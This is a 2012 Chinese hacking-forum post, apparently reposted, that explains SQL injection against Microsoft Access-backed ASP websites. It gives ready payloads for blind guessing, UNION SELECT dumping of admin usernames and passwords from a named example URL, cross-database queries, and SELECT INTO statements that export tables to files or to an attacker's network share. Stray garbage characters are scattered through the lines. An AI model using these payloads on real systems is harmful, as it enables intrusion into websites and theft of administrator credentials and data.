中国网络渗透测试联盟

标题: Access高级注入语句 [打印本页]
作者: admin    时间: 2012-9-15 14:20
标题: Access高级注入语句
--------------------------------------------------------------
  l. A! s; U, e, M8 R' P* H3 _0 Xunion查询法1 U' {  c( b4 _) H9 s  J; F
首先要说的就是查询办法,一般的查询办法就是1 l7 n( a: Q# ?' w* o# {8 F( A
1 j# E6 M, h7 w6 |# y
程序代码9 S& [- K2 v% ^% O7 r# `: s7 h
and 1=(select count(*) from admin where left(id,1)='1')
* \! Q! P; N+ ]0 D6 c4 [  r, ^( W7 X, I. K- F+ }
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
; G8 L# o0 s% o9 U; c6 U0 P2 ~所以这个时候,union select横空出现.别以为只能在PHP里用哦...0 V9 q5 g7 R( ~+ H  s
譬如你有一个ACCESS点:% @( J) N, T) s/ o& y0 k
程序代码/ ^) E9 |7 m: J& @/ k) `
http://bbs.tian6.com/xiaoyang.asp?coder=1+ v( p! G/ G" A7 O' e' r
7 n) g( \9 a/ T) l- I$ \0 p
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),8 u. b/ F& o4 F& n  P  f8 m
然后我们直接来:
% ]* l, B1 k0 d1 L) l程序代码+ c) v: H1 @( h5 W( b2 `9 q
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]9 T! i- D) p* A' t. J4 }

+ Y- i0 w3 @, T! H0 s这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
$ P1 b% o7 O  M) m8 |2 u- m5 U- x9 g# l
# h; C" K$ W8 z% {( b, ]1 H
& _) q0 o8 S; M* q- y7 y
---------------------------------------------------------------5 e) a  Z0 ?2 G  n0 N6 V! r
Access跨库查询
$ i& r6 o4 b6 d+ Z! Q6 G7 r4 V* g有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
0 P/ V( w3 n7 |6 d4 Z跨库的查询语句:  B% L5 {0 Q- Y
子查询:
* s6 `) l; e7 b9 ~1 E2 p! d$ h程序代码1 F, ^. W, E( Q6 c2 A& w: f
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
) g7 L/ x/ Z4 d2 {$ U6 s
1 d0 R& r6 A5 Kunion查询:
( X. f7 `! O7 [% Z- X6 q5 ^# H程序代码
2 Q0 ~# B! e3 l3 ^union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=14 C& E! ^5 X5 f: g% v

% Y9 b( B, c. J: s跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
- @8 n# G0 d8 t, t2 i程序代码$ G. J6 M0 ~& x0 `
http://www.4ngel.net/article/46.htm
# J1 a3 x, {) bhttp://hf110.com/Article/hack/rqsl/200502/66.html9 D% B$ z1 u+ c$ C

) v0 `9 U( F/ x+ |4 q---------------------------------------------------------------. y, C/ }1 L  S) X/ o$ R
Access注入,导出txt,htm,html6 H" W  K" k% J7 h) Z
子查询语句:/ F; z- X0 {1 M. Z  G
程序代码3 S. {3 z4 y% {/ B4 l1 J! E
Select * into [test.txt] in 'd:\web\' 'text;' from admin2 e4 _- M  l; L/ I8 R) J: I

7 o6 y- h4 V$ ~. K4 y. t4 U( l这样就把admin表的内容以test类型存进了d:\web里面.
& P: s6 S. J/ }UNION查询:& q4 r  r( N9 o$ G
程序代码
$ t5 B3 [8 c4 w8 j: c$ kunion select * into [admin.txt] in 'c:\' 'test;' from admin
- j( \  j- G1 d; D% t; ?1 A& u, A+ m/ j$ ]
而且这里也可以保存到本地来:. W# k# A9 _6 o
程序代码( U/ b* w9 o% ?- E. H2 \
Select * into [test.txt] in '\\yourip\share' 'text;' from admin5 }& c3 C& q6 @8 Q& L

( A3 M% n, A* n8 Z% X8 y7 W% x不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:$ L; x- S& T% O6 t; Y
/ u7 k0 t; k$ p: n% T$ `: |
程序代码6 B) l1 b2 h4 s
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
" ]7 p0 u" J' O! e" v
3 l3 `! C- Z5 F4 m, h因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的., E1 g: ?* Z% t6 K




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2